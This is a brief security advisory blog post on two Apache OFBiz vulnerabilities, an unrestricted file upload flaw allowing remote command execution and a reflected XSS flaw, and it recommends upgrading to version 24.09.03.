top of page
Search

Critical Apache OFBiz Flaw (CVE-2025-59118) Enables Remote Command Execution through Unrestricted File Upload

  • Nov 12, 2025
  • 1 min read

Key Findings


  • Newly disclosed vulnerabilities in Apache OFBiz, an open-source ERP platform

  • CVE-2025-59118: Unrestricted File Upload vulnerability allowing remote command execution (RCE)

  • CVE-2025-61623: Reflected cross-site scripting (XSS) vulnerability


Background


Apache OFBiz is an open-source enterprise resource planning (ERP) software used for managing critical business workflows, including accounting, e-commerce, and inventory management. As a widely adopted ERP platform, vulnerabilities in OFBiz can have significant impact on organizations that rely on it.


CVE-2025-59118: Unrestricted File Upload Vulnerability


  • Classified as an "Unrestricted Upload of File with Dangerous Type" vulnerability

  • Allows remote attackers to upload arbitrary files, such as malicious scripts, without proper validation or sanitization

  • Enables remote command execution (RCE) under the context of the running service

  • Gives attackers complete control over the underlying operating system and the ability to execute arbitrary commands, deploy web shells, or pivot deeper into the network


CVE-2025-61623: Reflected Cross-Site Scripting (XSS) Vulnerability


  • Allows attackers to inject malicious JavaScript into the browser of unsuspecting users via manipulated URLs or crafted input parameters

  • Can be used to steal session cookies, impersonate users, or perform unauthorized actions within OFBiz's web management console

  • Poses a significant threat in multi-user administrative environments, especially when combined with social engineering or phishing campaigns


Mitigation and Recommendations


  • The Apache Software Foundation (ASF) has released version 24.09.03, which fully addresses the vulnerabilities

  • ASF strongly urges immediate upgrades to mitigate the risks of exploitation

  • Organizations using Apache OFBiz should prioritize applying the security update to protect their critical business systems and data


Sources


  • https://securityonline.info/critical-apache-ofbiz-flaw-cve-2025-59118-allows-remote-command-execution-via-unrestricted-file-upload/

  • https://securityonline.info/critical-synology-beestation-zero-day-cve-2025-12686-found-at-pwn2own-allows-remote-code-execution/

Recent Posts

See All
Defeating AI with AI

Key Findings Generative AI and agentic AI are increasingly used by threat actors to conduct faster and more targeted attacks. One capability that AI improves for threat actors is the ability to profil

 
 
 

Comments

  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page